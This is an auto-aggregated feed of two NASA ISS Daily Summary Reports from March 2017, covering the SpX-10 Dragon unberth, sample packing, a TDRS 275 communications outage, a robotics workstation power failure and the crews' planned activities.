from ISS On-Orbit Status Report http://ift.tt/2mkDEgz
via IFTTT

ISS Daily Summary Report – 3/18/2017

Dragon SpaceX (SpX)-10 Unberth: The crew packed critical items and egressed the vehicle in preparation for Dragon departure.  Dragon was unberthed from the ISS via ground commanding at approximately 4:45 PM CST today.  Ground teams have started maneuvering the Dragon into a IDA viewing position followed by another maneuver about an hour and a half later to the overnight park position.   Dragon release is planned tomorrow morning at 5:11 AM CST with splashdown approximately 5 hours later.  Double Cold Bag (DCB) Packing: The crew performed the final DCB packing of the samples for planned for return on SpX-10.  The crew transferred samples and Ice Bricks from Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI), General Laboratory Active Cryogenic ISS Experiment Refrigerator (GLACIER), Freezer-Refrigerator Of STirling cycle (FROST), and Space Automated Bioproduct Laboratory (SABL) into the DCBs.  Warm samples and their conditioned Ice Bricks from MERLIN were packed into a Mini Cold Bag for SpX-10 return. Today’s Planned Activities All activities were completed unless otherwise noted. Weekly Housekeeping Double Coldbag Dragon Pack Cargo Transfer to Dragon Transfer Center Stack to Dragon Telephone Conference with the Russian Space Magazine Editor (S-band) Dragon Cargo Operations Conference СОЖ maintenance Dragon Egress in Preparation for Departure Node 2 Nadir CBM Control Panel Assembly (CPA) Installation USOS Window Shutter Close Dragon Vestibule Configuration for Demate Dragon/Node 2 VESTIBULE DEPRESS Closing Shutters on windows 6, 8, 9, 12, 13, 14 Dragon/Node 2 Vestibule MPEV Close Completed Task List Items Water Recovery System Waste Water Tank Drain Ground Activities All activities were completed unless otherwise noted. EPS ORU Refresh Dragon Unberth Operations IDA Viewing Dragon Overnight Park Three-Day Look Ahead: Sunday, 03/18: Dragon Release, Housekeeping, Crew Off Duty Monday, 03/19: USOS Crew Off Duty Tuesday, 03/21: EVA Preps (Procedure Review/Conf, ROBoT, Safer Checkout, Airlock unstow) QUICK ISS Status – Environmental Control Group:   Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off          [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Standby Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) ReProcess Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2n65fBc
via IFTTT

ISS Daily Summary Report – 3/17/2017

Tracking and Data Relay Satellite (TDRS) 275 Failure: On Wednesday evening, White Sands Facility reported a timeout of the 275 satellite. This resulted in a loss of both S-band and Ku-band communications. The ISS team worked to fill comm gaps where possible.  As of Friday, Network Specialists are still troubleshooting the issue with TDRS 275.  Currently TDRS 275 is expected to return to operations on Monday.  There have been no significant impacts to operations. Dragon Departure Preparations:  The crew completed a computer based training session to review the Dragon departure documentation and a Robotic Onboard Trainer (ROBoT) session which included two simulated Dragon release runs.  The crew have also successfully transferred Polar-1, Polar-2, Polar-3, and General Laboratory Active Cryogenic ISS Experiment Refrigerator (GLACIER)-5 to Dragon.  All units are providing good data and are actively cooling. SpX-10 Sample Return Preparations: In support of this weekend’s SpX-10 departure, the crew stowed NanoRacks Module 9, NanoRacks Platform 1, and Simple Solar Neutron Detector.  This morning, the crew moved the temporarily stowed APEX-04 Kennedy Space Center (KSC) Fixation Tube (KFT) to Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for conditioning prior tomorrow’s Double Cold Bag packing. At Home In Space Questionnaire: The crew attempted to answer the second of two At Home in Space questionnaires, however due to issues with the app the crew was unable to complete the questionnaire. Ground teams are looking into the issue. The Canadian Space Agency (CSA) experiment, At Home in Space, assesses culture, values, and psychosocial adaptation of astronauts to a space environment shared by multinational crews on long-duration missions. It is hypothesized that astronauts develop a shared space culture that is an adaptive strategy for handling cultural differences and they deal with the isolated confined environment of the spacecraft by creating a home in space. At Home In Space uses a questionnaire to investigate individual and culturally related differences, family functioning, values, coping with stress, and post-experience growth. Japanese Experiment Module (JEM) Remote Manipulator System (RMS):  Overnight, Ground Robotics Controllers activated the JEMRMS and stowed the Small Fine Arm (SFA) on the SFA Storage Equipment (SSE).  They then deactivated the JEMRMS.  Next Tuesday, the JEMRMS will grapple the JEM Exposed Facility (EF).  The crew removed the Launch Lock and Mount, performed a sharp edge inspection and performed a fit check of the Wrist Vision Equipment (WVE) camera. These tasks are in preparation for changeout of the JEMRMS WVE camera planned during the Extravehicular Activity (EVA) on March 24, 2017.  Advanced Resistive Exercise Device (ARED) Flywheel Set Screw Tightening: There are 4 Flywheels in ARED that provide inertial smoothing of an exercise cycle, avoiding a jerky exercise cycle. Each flywheel has 2 set screws that are torqued annually. The two left flywheels for the left ARED cylinder each have had 1 of 2 set screws whose torque could not be verified because the torque wrench would not fit. A redesigned tool was flown on HTV6 and used yesterday to successfully torque all 8 set screws. Robotic Work Stations (RWS) Remote Power Controller Module (RPCM) Failure: Today, during checkout of the Lab and Cupola RWS, RPCM LAS52A3B-A RPC-4 would not close.  This RPC powers Common Video Interface Unit (CVIU)-4 for the Cupola RWS.   Investigation of the signature indicates it is an FET Controller Hybrid (FCH) failure and must be Removed and Replaced (R&R’d). During the investigation, ground teams uncovered that RPC 1 may have a similar failure, and the Video Tape Recorder (VTR)-2 load on this RPC was previously declared failed. R&R of this RPCM has minimal powerdown impacts and is easily accessed. The result of this failure is only 2 of 3 Cupola RWS monitors are available. Only 2 RWS monitors are required for Visiting Vehicles capture and release. Additionally, a PCS (Portable Computer System) can be deployed in the Cupola for a third monitor if desired. There is no impact to the upcoming Extravehicular (EVAs) since these robotic operations are ground controlled. Ground teams are evaluating R&R of RPCM LAS52A3B-A next week.  Today’s Planned Activities All activities were completed unless otherwise noted. IMS Tagup Payload Stowage Reconfiguration Photo T/V (P/TV) Advanced Resistive Exercise Device (ARED) Exercise Video Setup APEX-04 MELFI Sample Insertion PILOT-T. Preparation for the experiment. Nikon still camera sync with station time Polar Express Rack Uninstall, Transfer, Handover and Dragon install Polar Express Rack Uninstall, Transfer and Handover PILOT-T. Experiment Ops. At Home In Space Questionnaire [Aborted] Vacuum cleaning ventilation grille on FGB interior panels (201, 301, 401) On-board Training (OBT) Dragon Departure Review MRM1-FGB Screw Clamp Tightening RELAKSATSIYA Hardware Setup. Glacier #5 Dragon Transfer On-board Training (OBT) Dragon Robotics Onboard Trainer (ROBoT) Release RELAKSATSIYA.  Parameter Settings Adjustment Polar Express Rack Uninstall, Transfer, and Dragon Install RELAKSATSIYA. Observation RELAKSATSIYA. Closeout Ops and Hardware Removal Rodent Research. Cleaning Rodent access module PAO Preparation Strata Status Check Public Affairs Office (PAO) High Definition (HD) Config JEM Setup PAO Preparation Public Affairs Office (PAO) Event in High Definition (HD) – JEM Recharging Soyuz 732 Samsung PC Battery (if charge level is below 80%) Photo/TV Photo/TV, Checking Camcorder Settings Double Coldbag Pack Review Long Duration Sorbent Testbed Status Check. Robotics Work Station (RWS) Display and Control Panel (DCP) Checkout NanoRacks Platform-1 Modules Removal Rodent Research. Stowage of Habitat Module MELFI Sample Insertion into a Box Module NanoRacks Module 9 Ops Session 5 Simple Solar Neutron Detector Hardware Stow Dragon Vestibule Outfitting Kit (VOK) Gather Double Coldbag Pack Review JEM Remote Manipulator System Wrist Vision Equipment (WVE) Z-93 Precautionary Unpack Space Headaches – Weekly Questionnaire Photo T/V (P/TV) Advanced Resistive Exercise Device (ARED) Exercise Video Stow JEMRMS Wrist Vision Equipment (WVE) Preparation for EVA. СОЖ Maintenance В3 Fan Screen Cleaning in MRM2 JEM Remote Manipulator System Wrist Vision Equipment EVA Tool Configuration Rodent Research. Stowage of Habitat Module JEM Remote Manipulator System Wrist Vision Equipment (WVE) Z-93 Stow PCG-5 Hardware Deactivation and Stow PCG-5 Hardware Photography Pressurized Mating Adapter 3 (PMA 3) Leak Check Term IMS Update Terminate Soyuz 732 Samsung PC Battery Recharge (if necessary) Rodent […]

from ISS On-Orbit Status Report http://ift.tt/2nrOGR7
via IFTTT